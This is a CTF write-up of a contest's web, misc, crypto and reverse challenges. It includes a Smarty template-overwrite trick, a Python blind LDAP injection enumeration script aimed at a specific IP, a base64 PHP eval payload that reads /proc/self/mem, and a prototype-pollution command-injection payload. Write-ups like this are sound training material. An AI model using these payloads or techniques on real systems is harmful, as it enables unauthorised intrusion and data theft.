Total score 2108, rank 57, still pretty weak. Writing it down anyway.
Web
Sign-in challenge:
Just assemble it by hand. The first submission was rejected; base64-decoding the result once more made it pass.
[Newbie] odd_upload
Challenge description: the directory layout is the same as the official project's example.
Opening the target showed the Smarty template engine, so I downloaded it from the official site and compared the directory layout and file extensions.
Upload a file, intercept the request and modify it so the upload overwrites index.tpl, and put the command to execute into the template.
Then request the homepage and the flag is in the output.
easyinject
Opening the target and crafting a URL produced an error that revealed LDAP injection. The hint says the flag is one user's username or e-mail address.
Pasting the script directly; it is not very complete, but the idea is there, and I was too lazy to polish it.
Extract the users from the output by hand and submit them one at a time.
import requests

# Target from the challenge. ``pass`` was given; ``user`` is the injected LDAP
# value. A trailing ``*`` makes it a wildcard, so the server's "user not found"
# message becomes an oracle for whether any name starts with a given prefix.
url = "http://47.106.172.144:2333/?pass=EC77k8RHquAMLKAX&"

# Characters tried at each position (letters, digits, and e-mail punctuation)
dist = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', '-', 'l', 'm',
        'n', 'o', 'p', 'q', 'r', '.', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
        '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '_', '@']


def bpuser(prefix):
    """Extend ``prefix`` (for example ``user=l``) one character at a time and
    return the values that no character extends any further, i.e. complete
    usernames. A name that is itself a prefix of a longer name only shows up
    in the printed payloads, so still read those."""
    found = []
    for ch in dist:
        payload = url + prefix + ch + "*"   # e.g. ...&user=la*
        print(payload)
        body = requests.get(url=payload).text
        if '找不到用户' in body:   # "user not found": nothing starts with this prefix
            continue
        found.extend(bpuser(prefix + ch))
    return found or [prefix]


user = bpuser("user=l")
print(user)
hideandseek (reproduced afterwards)
I couldn't do this one; it was reproduced later from an idea a senior gave me, and the payload below is theirs. My own was not as good.
Two hints were given:
hint1: how do you read a flag that sits in memory? Note: unrelated to the PHP version
hint2: Linux's strange file system
This challenge first requires knowing what the individual files under /proc on Linux represent.
Worth noting: you cannot simply read the mem file from the start; you have to read at the right offset, and the offsets come from the address ranges listed in the maps file. /proc/self/mem is the process's own virtual address space, so a file offset is a virtual address, which is why the payload passes the start address from each maps line to file_get_contents as its offset. It only looks at maps lines with no '/' in them (anonymous mappings: heap, stack, mmap arenas), since that is where PHP's own allocations, including a flag it read into a variable, end up. Two practical caveats: a region that is mapped but not readable makes file_get_contents return false with a warning, and dumping large regions whole can exceed memory_limit, so searching each region for the flag prefix is better than echoing everything.
payload:
?eval=eval(base64_decode("ICAgICAgICAkaGFuZGxlID0gZm9wZW4oIi9wcm9jL3NlbGYvbWFwcyIsICJyIik7CiAgICAgICAgaWYgKCRoYW5kbGUpIHsKICAgICAgICAgICAgd2hpbGUgKCFmZW9mICgkaGFuZGxlKSkgewogICAgICAgICAgICAgICAgJGJ1ZmZlciA9IGZnZXRzKCRoYW5kbGUpOwogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkYnVmZmVyLCAnLycpID09PSBmYWxzZSkgewogICAgICAgICAgICAgICAgICAgIC8vIGVjaG8gJGJ1ZmZlcjsKICAgICAgICAgICAgICAgICAgICAkcGF0dGVybiA9ICIvKFthLWYwLTldezEsfSktKFthLWYwLTldezEsfSkvIjsKICAgICAgICAgICAgICAgICAgICBwcmVnX21hdGNoKCRwYXR0ZXJuLCAkYnVmZmVyLCAkbWF0Y2hlcyk7CiAgICAgICAgICAgICAgICAgICAgdmFyX2R1bXAoJG1hdGNoZXMpOyAgLy/ovpPlh7rljLnphY3nu5PmnpwKICAgICAgICAgICAgICAgICAgICAkc3RhcnQgPSBoZXhkZWMoJG1hdGNoZXNbMV0pOwogICAgICAgICAgICAgICAgICAgICRlbmQgPSBoZXhkZWMoJG1hdGNoZXNbMl0pOwogICAgICAgICAgICAgICAgICAgICRzaXplID0gJGVuZC0kc3RhcnQ7CiAgICAgICAgICAgICAgICAgICAgJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygiL3Byb2Mvc2VsZi9tZW0iLEZBTFNFLE5VTEwsJHN0YXJ0LCRzaXplKTsKICAgICAgICAgICAgICAgICAgICAvLyBmbGFne30KICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiXG4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBmY2xvc2UgKCRoYW5kbGUpOwogICAgICAgIH0="));
The base64 decodes to the PHP below. As given it has one more closing brace than opening brace, with a "// flag{}" comment where a condition on $content apparently used to sit, so one brace has to go (or that condition be restored) before it runs:
        $handle = fopen("/proc/self/maps", "r");
        if ($handle) {
            while (!feof ($handle)) {
                $buffer = fgets($handle);
                if (strpos($buffer, '/') === false) {
                    // echo $buffer;
                    $pattern = "/([a-f0-9]{1,})-([a-f0-9]{1,})/";
                    preg_match($pattern, $buffer, $matches);
                    var_dump($matches);  // print the match result
                    $start = hexdec($matches[1]);
                    $end = hexdec($matches[2]);
                    $size = $end-$start;
                    $content = file_get_contents("/proc/self/mem",FALSE,NULL,$start,$size);
                    // flag{}
                        echo $content;
                        echo "\n";
                    }
                }
            }
            fclose ($handle);
        }
dirtyrce (reproduced afterwards)
This one is a reproduction: during the contest I simply did not think of prototype pollution, and I am still not fluent with this class of bug.
Challenge description: RCE IT! The flag is at /flag
hint: one check in the code is very odd; how can you exploit that check? Note the challenge name
Source:
var express = require('express');
var nodeCmd = require('node-cmd');
var bodyParser = require('body-parser');
const app = express();
var router = express.Router();
const port = 80;
app.use(bodyParser.urlencoded({
  extended: true
})).use(bodyParser.json());
function isValidIP(ip) {
  var reg = /^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])$/;
  return reg.test(ip);
}
app.post("/ping",
  function(req, res, next) {
    b = req.body.cmd;
    if (req.body.ping === undefined) {
      res.send('invalid parm');
      return;
    }
    ping = req.body.ping
    if (ping.time !== undefined) {
      time = Number(ping.time);
      if (time > 10 || time < 1) {
        res.send('invalid time');
        return;
      }
      // the only place ip is validated, and only when ping has more than one own key
      if (Object.keys(ping).length != 1 && ping.ip !== undefined && ping.ip != '') {
        if (!isValidIP(ping.ip)) {
          res.send('invalid ip addr');
          return;
        }
      }
    } else {
      res.send('need time parm');
      return;
    }
    ip = ((ping.ip !== undefined && ping.ip != '') ? ping.ip: '114.114.114.114');
    // ip is concatenated straight into a shell command
    nodeCmd.run('ping -n ' + time + ' ' + ip, //WINDOWS USE -n
      function(err, data, stderr) {
        res.send(data);
        return;
      });
  });
app.get('/',
  function(req, res, next) {
    res.redirect('index');
  });
app.get('/index',
  function(req, res, next) {
    res.send('<title>ping test</title><form action="/ping" method="POST">Ip:<input type="text" name="ping[ip]"" placeholder="default value 114 dns"><br>Times:<input type="text" name="ping[time]" value="1"><input type="submit" value="Ping !"></form> ');
  });
app.listen(port);
The problem is this check in the /ping handler:
if (Object.keys(ping).length != 1 && ping.ip !== undefined && ping.ip != '') { ... }
It is the only place in the whole program that validates ip, and ip is concatenated straight into the shell command, so once we are past it there is nothing between us and RCE.
If we send only time, Object.keys(ping).length is 1 and the block is skipped, but then ping.ip is undefined and the default 114.114.114.114 is used. The way in is prototype pollution, with a payload like:
ping[__proto__][ip]=;cat /flag&ping[time]=1
The query-string parser behind body-parser (qs, in the version this challenge ran) treats the __proto__ segment as an assignment to the prototype of the ping object, so ip is inherited rather than an own property: Object.keys(ping) is just ['time'], the validation block is skipped, yet ping.ip !== undefined picks up ;cat /flag, the command becomes ping -n 1 ;cat /flag, and the shell runs the second command.
That bypasses every check and gives RCE.
Misc
Sign-in
The challenge hands you the flag directly; just submit it.
[Newbie] Where is it
A PDF document: Ctrl+A, Ctrl+C, create a txt file, paste, scroll down and the flag is there.
Crypto
[Sign-in] Keyboard warrior
Trace the given letters on a keyboard; the shape they draw is the answer.
[Newbie] Primes
The challenge asks for ten 1024-bit primes; find a script online, generate them and submit.
Reverse
[Sign-in] signin
Open it in IDA, press Shift+F12, and the flag is right there in the strings window.